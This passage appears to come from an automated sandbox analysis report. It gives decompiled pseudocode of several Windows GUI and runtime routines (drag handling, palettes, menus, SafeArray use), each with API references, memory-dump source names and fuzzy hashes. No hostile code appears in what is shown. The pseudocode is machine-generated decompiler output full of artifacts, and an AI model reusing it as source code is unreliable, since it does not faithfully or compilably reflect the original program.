*(__edi + 8) = *(__edi + 8) - _v20; __eax = *(__edi + 8); _v12 = __eax; goto L46; case 5: __eax = *(__esi + 0x40); _v12 = *(__esi + 0x40); __eax = *(__esi + 0x44); _v16 = *(__esi + 0x44); __eax = &_v16; _push( &_v16); __eax = &_v20; _push( &_v20); __eax = &_v24; _push( &_v24); _push(__edi); __eax = &_v40; _push( &_v40); __ecx = &_v12; __edx = __esi; __eax = _v8; __eax = *((intOrPtr*)( *_v8 + 0xac))(); goto L46; } } _t194 = (_a16 & 0x000000ff) - 0xffffffffffffffff; if(_t194 < 0 || _t194 == 3) { goto L38; } else { goto L39; } } _t198 = (_a16 & 0x000000ff) + 0xfd - 2; if(_t198 < 0 || _t198 == 1) { goto L34; } else { goto L35; } } else { _v12 = *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x78)))) + 0x10))(); _v16 = *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x78)))) + 0x10))(); _v20 = *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x78)))) + 0x10))(); _v24 = *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x78)))) + 0x10))(); if(( *(_t292 + 0x61) & 0x00000004) == 0) { __eflags = *(_t292 + 0x61) & 0x00000001; if(__eflags == 0) { _t238 = _t237 - _t284; __eflags = _t238; _v12 = _t238; } } else { if(( *(_t292 + 0x61) & 0x00000001) == 0) { _v12 = *_t244 - *(_t292 + 0x175) - *((intOrPtr*)(_t292 + 0x165)); } else { _v20 = *_t244 - *(_t292 + 0x175) - *((intOrPtr*)(_t292 + 0x165)); } } if(( *(_t292 + 0x61) & 0x00000008) == 0) { __eflags = *(_t292 + 0x61) & 0x00000002; if(__eflags == 0) { _t228 = MulDiv( *(_t292 + 0x169), _t244[1], *(_t292 + 0x179)); _t278 = _v24 >> 1; if(__eflags < 0) { asm("adc edx, 0x0"); } _t229 = _t228 - _t278; __eflags = _t229; _v16 = _t229; } } else { if(( *(_t292 + 0x61) & 0x00000002) == 0) { _v16 = _t244[1] - *(_t292 + 0x179) - *(_t292 + 0x169); } else { _v24 = _t244[1] - *(_t292 + 0x179) - *(_t292 + 0x169); } } if(_a4 != 0) { _t302 = ( *0x43ddb8 & 0x000000ff) - ( *0x43ddb4 & 0x000000ff & *(_t292 + 0x61)); if(_t302 != 0) { _t223 = MulDiv( *(_t292 + 0x16d), *_t244, *(_t292 + 0x175)); _t276 = _v20 >> 1; if(_t302 < 0) { asm("adc edx, 0x0"); } _v12 = _t223 - _t276; } _t304 = ( *0x43ddb8 & 0x000000ff) - ( *0x43ddbc & 0x000000ff & *(_t292 + 0x61)); if(_t304 != 0) { _t218 = MulDiv( *(_t292 + 0x171), _t244[1], *(_t292 + 0x179)); _t274 = _v24 >> 1; if(_t304 < 0) { asm("adc edx, 0x0"); } _v16 = _t218 - _t274; } } _t170 = E00447BB8( *((intOrPtr*)(_t292 + 0x78)), _v12, 1, _v24, _v20); goto L30; } } _t7 = (_a16 & 0x000000ff) + 0x462568; // 0xb0d0703 _t170 = *_t7 & 0x000000ff; if(_t170 == *((intOrPtr*)(__edx + 0x61))) { goto L31; } goto L2; } 0x0043d9e0 0x0043d9ef 0x0043d9f0 0x0043d9f1 0x0043d9f2 0x0043d9f3 0x0043d9f5 0x0043d9f7 0x0043d9fa 0x0043da01 0x0043da17 0x0043da1e 0x0043dbc6 0x0043dbca 0x0043ddae 0x0043ddae 0x0043ddae 0x0043dbd0 0x0043dbd5 0x0043dbdc 0x0043dbec 0x0043dbf9 0x0043dbfc 0x0043dc02 0x0043dc09 0x0043dc18 0x0043dc25 0x0043dc28 0x0043dc2a 0x0043dc30 0x0043dc33 0x0043dc3a 0x0043dcb7 0x0043dcca 0x0043dcdf 0x0043dcf7 0x0043dcf7 0x0043dcfe 0x00000000 0x00000000 0x0043dd04 0x00000000 0x00000000 0x00000000 0x0043dd2d 0x0043dd35 0x00000000 0x00000000 0x0043dd3a 0x0043dd3f 0x0043dd42 0x0043dd44 0x0043dd4a 0x0043dd4c 0x00000000 0x00000000 0x0043dd51 0x0043dd56 0x0043dd59 0x0043dd5b 0x0043dd61 0x0043dd63 0x00000000 0x00000000 0x0043dd67 0x0043dd6c 0x0043dd6f 0x0043dd71 0x0043dd77 0x0043dd79 0x00000000 0x00000000 0x0043dd7e 0x0043dd83 0x0043dd86 0x0043dd88 0x0043dd8e 0x0043dd90 0x0043dd93 0x0043dd98 0x0043dd9b 0x0043dd9d 0x0043dda3 0x0043dda5 0x0043dda5 0x0043dda5 0x00000000 0x00000000 0x0043dd04 0x0043dceb 0x0043dcf1 0x00000000 0x00000000 0x00000000 0x0043dcf1 0x0043dc3c 0x00000000 0x00000000 0x00000000 0x0043dc62 0x00000000 0x00000000 0x0043dc67 0x0043dc6a 0x0043dc6d 0x0043dc70 0x00000000 0x00000000 0x0043dc75 0x0043dc78 0x00000000 0x00000000 0x0043dc7c 0x0043dc7f 0x0043dc82 0x0043dc85 0x00000000 0x00000000 0x0043dc8a 0x0043dc8d 0x0043dc90 0x0043dc93 0x0043dc96 0x0043dc99 0x0043dc9a 0x0043dc9d 0x0043dc9e 0x0043dca1 0x0043dca2 0x0043dca3 0x0043dca6 0x0043dca7 0x0043dcaa 0x0043dcac 0x0043dcb1 0x00000000 0x00000000 0x0043dc3c 0x0043dc10 0x0043dc12 0x00000000 0x00000000 0x00000000 0x00000000 0x0043dc12 0x0043dbe4 0x0043dbe6 0x00000000 0x00000000 0x00000000 0x00000000 0x0043da31 0x0043da3b 0x0043da4b 0x0043da5b 0x0043da6b 0x0043da72 0x0043daa4 0x0043daa8 0x0043daca 0x0043daca 0x0043dacc 0x0043dacc 0x0043da74 0x0043da78 0x0043da9f 0x0043da7a 0x0043da8a 0x0043da8a 0x0043da78 0x0043dad3 0x0043db07 0x0043db0b 0x0043db1f 0x0043db27 0x0043db29 0x0043db2b 0x0043db2b 0x0043db2e 0x0043db2e 0x0043db30 0x0043db30 0x0043dad5 0x0043dad9 0x0043db02 0x0043dadb 0x0043daec 0x0043daec 0x0043dad9 0x0043db37 0x0043db4a 0x0043db4c 0x0043db5f 0x0043db67 0x0043db69 0x0043db6b 0x0043db6b 0x0043db70 0x0043db70 0x0043db84 0x0043db86 0x0043db9a 0x0043dba2 0x0043dba4 0x0043dba6 0x0043dba6 0x0043dbab 0x0043dbab 0x0043db86 0x0043dbc1 0x00000000 0x0043dbc1 0x0043da1e 0x0043da07 0x0043da07 0x0043da11 0x00000000 0x00000000 0x00000000

APIs

MulDiv.KERNEL32(?,00000000,00000000), ref: 0043DB5F MulDiv.KERNEL32(?,?,?), ref: 0043DB9A

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: String ID: API String ID: Opcode ID: ac93a01106b9b8afdc737577d4b32e1d48ec0ca0db69446e1e7388fe02ce81ee Instruction ID: 362d5403a1925025f21cd0c7a8b8993e4e77c4d1e46d8b923cef89c0b287574d Opcode Fuzzy Hash: ac93a01106b9b8afdc737577d4b32e1d48ec0ca0db69446e1e7388fe02ce81ee Instruction Fuzzy Hash: 89D16870A04A059FDB11CF69C484AAABBF6FF89300F24895AE856DB754C738FD41CB51

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 93%

E00438594(intOrPtr* __eax, signed int __edx) { intOrPtr _v16; char _v20; char _v24; char _v28; intOrPtr _t51; intOrPtr _t52; intOrPtr _t55; intOrPtr _t56; intOrPtr _t57; intOrPtr _t58; intOrPtr* _t62; intOrPtr* _t64; struct HICON__* _t67; intOrPtr _t69; intOrPtr* _t74; intOrPtr _t76; intOrPtr* _t77; intOrPtr* _t79; intOrPtr _t82; intOrPtr _t84; intOrPtr _t86; intOrPtr _t88; intOrPtr _t89; struct HWND__* _t92; intOrPtr _t93; intOrPtr _t95; intOrPtr _t96; intOrPtr* _t98; intOrPtr _t102; intOrPtr _t105; intOrPtr _t107; intOrPtr _t108; intOrPtr _t109; intOrPtr _t111; struct HWND__* _t112; intOrPtr _t113; intOrPtr _t115; intOrPtr _t119; intOrPtr* _t122; intOrPtr _t123; void* _t137; intOrPtr _t141; intOrPtr _t147; void* _t163; char _t164; intOrPtr _t166; void* _t173; void* _t174; _t122 = __eax; if( *0x466530 != 0) { L3: _t51 = *0x466510; // 0x0 _t52 = *0x466510; // 0x0 _t166 = E00438468(_t122, *(_t52 + 0x8f) & 0x000000ff, &_v28, _t51); if( *0x466530 == 0) { _t176 = *0x466534; if( *0x466534 != 0) { _t111 = *0x466524; // 0x0 _t112 = GetDesktopWindow(); _t113 = *0x466534; // 0x0 L00443F74(_t113, _t112, _t176, _t111); } } _t55 = *0x466510; // 0x0 if( *((char*)(_t55 + 0x8f)) != 0) { __eflags = *0x466530; _t6 = &_v24; *_t6 = *0x466530 != 0; __eflags = *_t6; *0x466530 = 2; } else { *0x466530 = 1; _v24 = 0; } _t56 = *0x466514; // 0x0 if(_t166 == *((intOrPtr*)(_t56 + 8))) { L12: _t57 = *0x466514; // 0x0 *((intOrPtr*)(_t57 + 0x10)) = *_t122; *((intOrPtr*)(_t57 + 0x14)) = *((intOrPtr*)(_t122 + 4)); _t58 = *0x466514; // 0x0 if( *((intOrPtr*)(_t58 + 8)) != 0) { _t102 = *0x466514; // 0x0 E0043A55C( *((intOrPtr*)(_t102 + 8)), &_v20, _t122); _t105 = *0x466514; // 0x0 *((intOrPtr*)(_t105 + 0x18)) = _v20; *((intOrPtr*)(_t105 + 0x1c)) = _v16; } _t137 = E004384B8(2); _t62 = *0x466514; // 0x0 _t163 = *((intOrPtr*)( *_t62 + 4))( *((intOrPtr*)(_t122 + 4))); if( *0x466534 == 0) { L22: _t64 = *0x462f14; // 0x466584 _t67 = SetCursor(E00454B00( *_t64, _t163)); if( *0x466530 != 2) { goto L34; } _t188 = _t166; if(_t166 != 0) { _t164 = E004384F4(); _t69 = *0x466514; // 0x0 *((intOrPtr*)(_t69 + 0x60)) = _t164; __eflags = _t164; if(__eflags != 0) { E0043A55C(_t164, &_v24, _t122); _t67 = E00403B24(_t164, __eflags); _t141 = *0x466514; // 0x0 *(_t141 + 0x5c) = _t67; } else { _t82 = *0x466514; // 0x0 _t67 = E00403B24( *((intOrPtr*)(_t82 + 8)), __eflags); _t147 = *0x466514; // 0x0 *(_t147 + 0x5c) = _t67; } } else { _push( *((intOrPtr*)(_t122 + 4))); _t84 = *0x466514; // 0x0 _t67 = E00403B24( *((intOrPtr*)(_t84 + 0x40)), _t188); } if( *0x466514 == 0) { goto L34; } else { _t123 = *0x466514; // 0x0 _t42 = _t123 + 0x64; // 0x64 _t43 = _t123 + 0x4c; // 0x4c _t67 = E00408670(_t43, 0x10, _t42); if(_t67 != 0) { goto L34; } if(_v28 != 0) { _t77 = *0x466514; // 0x0 if( *((intOrPtr*)( *_t77 + 0x3c))() != 0) { _t79 = *0x466514; // 0x0 *((intOrPtr*)( *_t79 + 0x34))(); } } _t74 = *0x466514; // 0x0 *((intOrPtr*)( *_t74 + 0x30))(); _t76 = *0x466514; // 0x0 asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); return _t76; } } else { if(_t166 == 0 || ( *(_t166 + 0x51) & 0x00000020) != 0) { L18: _t86 = *0x466534; // 0x0 L00443F50(_t86, _t163); _t88 = *0x466534; // 0x0 _t186 = *((char*)(_t88 + 0x6a)); if( *((char*)(_t88 + 0x6a)) != 0) { _t89 = *0x466534; // 0x0 E00444070(_t89, *((intOrPtr*)(_t122 + 4)), *_t122, __eflags); } else { _t92 = GetDesktopWindow(); _t93 = *0x466534; // 0x0 L00443F74(_t93, _t92, _t186, *((intOrPtr*)(_t122 + 4))); } goto L22; } else { _t95 = *0x466514; // 0x0 if( *((char*)(_t95 + 4)) == 0) { _t96 = *0x466534; // 0x0 E004440E4(_t96, _t137, __eflags); _t98 = *0x462f14; // 0x466584 SetCursor(E00454B00( *_t98, _t163)); goto L22; } goto L18; } } } else { _t67 = E004384B8(1); if( *0x466514 == 0) { L34: return _t67; } _t107 = *0x466514; // 0x0 *((intOrPtr*)(_t107 + 8)) = _t166; _t108 = *0x466514; // 0x0 *((intOrPtr*)(_t108 + 0xc)) = _v28; _t109 = *0x466514; // 0x0 *((intOrPtr*)(_t109 + 0x10)) = *_t122; *((intOrPtr*)(_t109 + 0x14)) = *((intOrPtr*)(_t122 + 4)); _t67 = E004384B8(0); if( *0x466514 == 0) { goto L34; } goto L12; } } _t115 = *0x466520; // 0x0 asm("cdq"); _t173 = (_t115 - *__eax ^ __edx) - __edx - *0x46652c; // 0x0 if(_t173 >= 0) { goto L3; } _t119 = *0x466524; // 0x0 asm("cdq"); _t67 = (_t119 - *((intOrPtr*)(__eax + 4)) ^ __edx) - __edx; _t174 = _t67 - *0x46652c; // 0x0 if(_t174 < 0) { goto L34; } goto L3; } 0x0043859a 0x004385a3 0x004385d2 0x004385d2 0x004385d8 0x004385ef 0x004385f8 0x004385fa 0x00438601 0x00438603 0x00438609 0x00438616 0x0043861b 0x0043861b 0x00438601 0x00438620 0x0043862c 0x0043863c 0x00438643 0x00438643 0x00438643 0x00438648 0x0043862e 0x0043862e 0x00438635 0x00438635 0x0043864f 0x00438657 0x004386a4 0x004386a4 0x004386ab 0x004386b1 0x004386b4 0x004386bd 0x004386c5 0x004386cd 0x004386d2 0x004386db 0x004386e2 0x004386e2 0x004386f0 0x004386f4 0x004386fe 0x00438707 0x0043877e 0x00438781 0x0043878e 0x0043879a 0x00000000 0x00000000 0x004387a0 0x004387a2 0x004387c3 0x004387c5 0x004387ca 0x004387cd 0x004387cf 0x004387fd 0x0043880c 0x00438811 0x00438817 0x004387d1 0x004387d9 0x004387e5 0x004387ea 0x004387f0 0x004387f0 0x004387a4 0x004387a7 0x004387aa 0x004387b7 0x004387b7 0x00438821 0x00000000 0x00438823 0x00438823 0x00438829 0x0043882c 0x00438834 0x0043883b 0x00000000 0x00000000 0x00438842 0x00438844 0x00438850 0x00438852 0x00438859 0x00438859 0x00438850 0x0043885c 0x00438863 0x00438866 0x00438871 0x00438872 0x00438873 0x00438874 0x00000000 0x00438874 0x00438709 0x0043870b 0x0043871e 0x00438720 0x00438725 0x0043872a 0x0043872f 0x00438733 0x00438753 0x00438758 0x00438735 0x00438739 0x00438742 0x00438747 0x00438747 0x00000000 0x00438713 0x00438713 0x0043871c 0x0043875f 0x00438764 0x0043876c 0x00438779 0x00000000 0x00438779 0x00000000 0x0043871c 0x0043870b 0x00438659 0x0043865b 0x00438667 0x0043887b 0x0043887b 0x0043887b 0x0043866d 0x00438672 0x00438675 0x0043867d 0x00438680 0x00438687 0x0043868d 0x00438692 0x0043869e 0x00000000 0x00000000 0x00000000 0x0043869e 0x00438657 0x004385a5 0x004385ac 0x004385b1 0x004385b7 0x00000000 0x00000000 0x004385b9 0x004385c1 0x004385c4 0x004385c6 0x004385cc 0x00000000 0x00000000 0x00000000

APIs

GetDesktopWindow.USER32 ref: 00438609 GetDesktopWindow.USER32 ref: 00438739 SetCursor.USER32(00000000), ref: 0043878E Part of subcall function 004440E4: ImageList_EndDrag.COMCTL32(?,-00000010,00438769), ref: 00444100 SetCursor.USER32(00000000), ref: 00438779

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CursorDesktopWindow$DragImageList_ String ID: API String ID: 617806055-0 Opcode ID: 3bcd75b5abe411c5b0deca700f6720d75792e6beb4e63713e0ee92e8f9771c6a Instruction ID: 08362208b1a53e947958c9dd7a602420f7f888ca1ef680945a718b5847218c5a Opcode Fuzzy Hash: 3bcd75b5abe411c5b0deca700f6720d75792e6beb4e63713e0ee92e8f9771c6a Instruction Fuzzy Hash: C7915274600240EFC704DF29E986A15B7E1BB48308F15916AF4458B37AEBB8ED45CF6B

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 82%

E0040F840(signed short* __eax) { char _v260; char _v768; char _v772; signed short* _v776; signed short* _v780; char _v784; signed int _v788; char _v792; intOrPtr* _v796; signed char _t43; intOrPtr* _t60; void* _t79; void* _t81; void* _t84; void* _t85; intOrPtr* _t92; void* _t96; char* _t97; void* _t98; _v776 = __eax; if((_v776[0] & 0x00000020) == 0) { E0040F688(0x80070057); } _t43 = *_v776 & 0x0000ffff; if((_t43 & 0x00000fff) == 0xc) { if((_t43 & 0x00000040) == 0) { _v780 = _v776[4]; } else { _v780 = *(_v776[4]); } _v788 = *_v780 & 0x0000ffff; _t79 = _v788 - 1; if(_t79 >= 0) { _t85 = _t79 + 1; _t96 = 0; _t97 = &_v772; do { _v796 = _t97; _push(_v796 + 4); _t22 = _t96 + 1; // 0x1 _push(_v780); L0040E714(); E0040F688(_v780); _push( &_v784); _t25 = _t96 + 1; // 0x1 _push(_v780); L0040E71C(); E0040F688(_v780); *_v796 = _v784 - *((intOrPtr*)(_v796 + 4)) + 1; _t96 = _t96 + 1; _t97 = _t97 + 8; _t85 = _t85 - 1; } while (_t85 != 0); } _t81 = _v788 - 1; if(_t81 >= 0) { _t84 = _t81 + 1; _t60 = &_v768; _t92 = &_v260; do { *_t92 = *_t60; _t92 = _t92 + 4; _t60 = _t60 + 8; _t84 = _t84 - 1; } while (_t84 != 0); do { goto L12; } while (E0040F7E4(_t83, _t98) != 0); goto L15; } L12: _t83 = _v788 - 1; if(E0040F7B4(_v788 - 1, _t98) != 0) { _push( &_v792); _push( &_v260); _push(_v780); L0040E744(); E0040F688(_v780); E0040FA38(_v792); } } L15: _push(_v776); L0040E2A4(); return E0040F688(_v776); } 0x0040f84c 0x0040f85c 0x0040f863 0x0040f863 0x0040f86e 0x0040f87c 0x0040f88b 0x0040f8a9 0x0040f88d 0x0040f898 0x0040f898 0x0040f8b8 0x0040f8c4 0x0040f8c7 0x0040f8c9 0x0040f8ca 0x0040f8cc 0x0040f8d2 0x0040f8d4 0x0040f8e3 0x0040f8e4 0x0040f8ee 0x0040f8ef 0x0040f8f4 0x0040f8ff 0x0040f900 0x0040f90a 0x0040f90b 0x0040f910 0x0040f92b 0x0040f92d 0x0040f92e 0x0040f931 0x0040f931 0x0040f8d2 0x0040f93a 0x0040f93d 0x0040f93f 0x0040f940 0x0040f946 0x0040f94c 0x0040f94e 0x0040f950 0x0040f953 0x0040f956 0x0040f956 0x0040f959 0x00000000 0x00000000 0x00000000 0x0040f959 0x0040f959 0x0040f960 0x0040f96b 0x0040f973 0x0040f97a 0x0040f981 0x0040f982 0x0040f987 0x0040f992 0x0040f992 0x0040f9a0 0x0040f9a4 0x0040f9aa 0x0040f9ab 0x0040f9bb

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040F8EF SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040F90B SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040F982 VariantClear.OLEAUT32(?), ref: 0040F9AB

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant String ID: API String ID: 920484758-0 Opcode ID: d17882f798cf53baf8a39fefcb7af180c9a2307b2ce2c27e917eb7973a9318f3 Instruction ID: 8ec9ce3e26e7a4601e4635a5e9cb7351c893333f832fa8fc9e86651aa83f5178 Opcode Fuzzy Hash: d17882f798cf53baf8a39fefcb7af180c9a2307b2ce2c27e917eb7973a9318f3 Instruction Fuzzy Hash: 19413F75A012199FCB61EB59CC90BC9B3BCAF48304F4045FAE548F7652DA38AF858F54

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 75%

E004283D0(intOrPtr __eax, void* __edx) { intOrPtr _v8; void* __ebx; void* __ecx; void* __esi; void* __ebp; intOrPtr _t33; intOrPtr _t59; struct HDC__* _t69; void* _t70; intOrPtr _t79; void* _t84; struct HPALETTE__* _t85; intOrPtr _t87; intOrPtr _t89; _t87 = _t89; _push(_t70); _v8 = __eax; _t33 = _v8; if( *((intOrPtr*)(_t33 + 0x58)) == 0) { return _t33; } else { E004265A0(_v8); _push(_t87); _push(0x4284af); _push( *[fs:eax]); *[fs:eax] = _t89; E004296F8( *((intOrPtr*)(_v8 + 0x58))); E0042824C( *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8)); E004297F8( *((intOrPtr*)(_v8 + 0x58))); _t69 = CreateCompatibleDC(0); _t84 = *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8); if(_t84 == 0) { *((intOrPtr*)(_v8 + 0x5c)) = 0; } else { *((intOrPtr*)(_v8 + 0x5c)) = SelectObject(_t69, _t84); } _t85 = *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 0x10); if(_t85 == 0) { *((intOrPtr*)(_v8 + 0x60)) = 0; } else { *((intOrPtr*)(_v8 + 0x60)) = SelectPalette(_t69, _t85, 0xffffffff); RealizePalette(_t69); } E004268A4(_v8, _t69); _t59 = *0x461eec; // 0x2711c68 E0041AAF4(_t59, _t69, _t70, _v8, _t85); _pop(_t79); *[fs:eax] = _t79; _push(0x4284b6); return E00426710(_v8); } } 0x004283d1 0x004283d3 0x004283d6 0x004283d9 0x004283e0 0x004284ba 0x004283e6 0x004283e9 0x004283f0 0x004283f1 0x004283f6 0x004283f9 0x00428402 0x00428413 0x0042841e 0x0042842a 0x00428435 0x0042843a 0x00428450 0x0042843c 0x00428446 0x00428446 0x0042845c 0x00428461 0x0042847f 0x00428463 0x0042846f 0x00428473 0x00428473 0x00428487 0x0042848f 0x00428494 0x0042849b 0x0042849e 0x004284a1 0x004284ae 0x004284ae

APIs

Part of subcall function 004265A0: EnterCriticalSection.KERNEL32(00466380,00000000,00424F52,00000000,00424FB1), ref: 004265A8 Part of subcall function 004265A0: LeaveCriticalSection.KERNEL32(00466380,00466380,00000000,00424F52,00000000,00424FB1), ref: 004265B5 Part of subcall function 004265A0: EnterCriticalSection.KERNEL32(00000038,00466380,00466380,00000000,00424F52,00000000,00424FB1), ref: 004265BE Part of subcall function 004297F8: GetDC.USER32(00000000), ref: 0042984E Part of subcall function 004297F8: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00429863 Part of subcall function 004297F8: GetDeviceCaps.GDI32(00000000,0000000E), ref: 0042986D Part of subcall function 004297F8: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00428423,00000000,004284AF), ref: 00429891 Part of subcall function 004297F8: ReleaseDC.USER32 ref: 0042989C CreateCompatibleDC.GDI32(00000000), ref: 00428425 SelectObject.GDI32(00000000,?), ref: 0042843E SelectPalette.GDI32(00000000,?,000000FF), ref: 00428467 RealizePalette.GDI32(00000000), ref: 00428473

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalPaletteSection$CapsCreateDeviceEnterSelect$CompatibleHalftoneLeaveObjectRealizeRelease String ID: API String ID: 979337279-0 Opcode ID: 93bebc2edd455ddf18fa106c5646cc94971223008aa3a34a3a8727028a1c549a Instruction ID: e87ff1c804d76903f950264df5696ada03ea7b14f1511ea4f0a767a0c079a61f Opcode Fuzzy Hash: 93bebc2edd455ddf18fa106c5646cc94971223008aa3a34a3a8727028a1c549a Instruction Fuzzy Hash: AA310934B01664EFD704EB59D981D4DB7F5EF48314B6241AAF804AB362DA38EE40DB54

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E00434010(void* __eax, struct HMENU__* __edx, int _a4, int _a8, CHAR* _a12) { intOrPtr _v8; void* __ecx; void* __edi; int _t27; void* _t40; int _t41; int _t50; _t50 = _t41; _t49 = __edx; _t40 = __eax; if(E004334A8(__eax) == 0) { return GetMenuStringA(__edx, _t50, _a12, _a8, _a4); } _v8 = 0; if((GetMenuState(__edx, _t50, _a4) & 0x00000010) == 0) { _t27 = GetMenuItemID(_t49, _t50); _t51 = _t27; if(_t27 != 0xffffffff) { _v8 = E00433324(_t40, 0, _t51); } } else { _t49 = GetSubMenu(_t49, _t50); _v8 = E00433324(_t40, 1, _t37); } if(_v8 == 0) { return 0; } else { *_a12 = 0; E004090D8(_a12, _a8, *((intOrPtr*)(_v8 + 0x30))); return E00409008(_a12, _t49); } } 0x00434017 0x00434019 0x0043401b 0x00434026 0x00000000 0x004340aa 0x0043402a 0x0043403a 0x00434057 0x0043405c 0x00434061 0x0043406e 0x0043406e 0x0043403c 0x00434043 0x00434050 0x00434050 0x00434075 0x00000000 0x00434077 0x0043407a 0x00434089 0x00000000 0x00434091

APIs

GetMenuState.USER32 ref: 00434033 GetSubMenu.USER32 ref: 0043403E GetMenuItemID.USER32(?,?), ref: 00434057 GetMenuStringA.USER32(?,?,?,?,?), ref: 004340AA

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$ItemStateString String ID: API String ID: 306270399-0 Opcode ID: c83668f70c58b27ff1ae3854190cf90560c38d16cda432900dd57c84b320ed91 Instruction ID: 11efe109d52895c86013a67b98394270421268660deb29a3708cc45bd7cb4ea2 Opcode Fuzzy Hash: c83668f70c58b27ff1ae3854190cf90560c38d16cda432900dd57c84b320ed91 Instruction Fuzzy Hash: 0511AF31701214AFC714EE69CC809EF7BE8AF89364F10542AF909D7382CA38AD019768

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 65%

E00429958(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8, void* _a12) { intOrPtr _v8; intOrPtr _v12; intOrPtr _t62; intOrPtr _t64; intOrPtr _t67; void* _t77; void* _t78; intOrPtr _t79; intOrPtr _t80; _t77 = _t78; _t79 = _t78 + 0xfffffff8; _v8 = __eax; _v12 = E004038F8(1); _push(_t77); _push(0x4299e0); _push( *[fs:eax]); *[fs:eax] = _t79; *((intOrPtr*)(_v12 + 8)) = __edx; *((intOrPtr*)(_v12 + 0x10)) = __ecx; memcpy(_v12 + 0x18, _a12, 0x15 << 2); _t80 = _t79 + 0xc; _t12 = &_a8; // 0x466368 *((char*)(_v12 + 0x70)) = *_t12 & 0x000000ff; if( *((intOrPtr*)(_v12 + 0x2c)) != 0) { *((intOrPtr*)(_v12 + 0x14)) = *((intOrPtr*)(_v12 + 8)); } _t62 = *0x418b88; // 0x418bd4 *((intOrPtr*)(_v12 + 0x6c)) = E00403AD8(_a4, _t62); _pop(_t64); *[fs:eax] = _t64; EnterCriticalSection(0x466368); _push(_t77); _push(0x429a40); _push( *[fs:edx]); *[fs:edx] = _t80; E004284C0( *((intOrPtr*)(_v8 + 0x28))); *((intOrPtr*)(_v8 + 0x28)) = _v12; E004284BC(_v12); _pop(_t67); *[fs:eax] = _t67; _push(0x429a47); LeaveCriticalSection(0x466368); return 0; } 0x00429959 0x0042995b 0x00429965 0x00429974 0x00429979 0x0042997a 0x0042997f 0x00429982 0x00429988 0x0042998e 0x004299a1 0x004299a1 0x004299a6 0x004299aa 0x004299b4 0x004299bf 0x004299bf 0x004299c5 0x004299d3 0x004299d8 0x004299db 0x004299fc 0x00429a03 0x00429a04 0x00429a09 0x00429a0c 0x00429a15 0x00429a20 0x00429a23 0x00429a2a 0x00429a2d 0x00429a30 0x00429a3a 0x00429a3f

APIs

EnterCriticalSection.KERNEL32(00466368), ref: 004299FC LeaveCriticalSection.KERNEL32(00466368,00429A47,00466368), ref: 00429A3A

Strings

XHB , xrefs: 0042996A hcF , xrefs: 004299A6

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

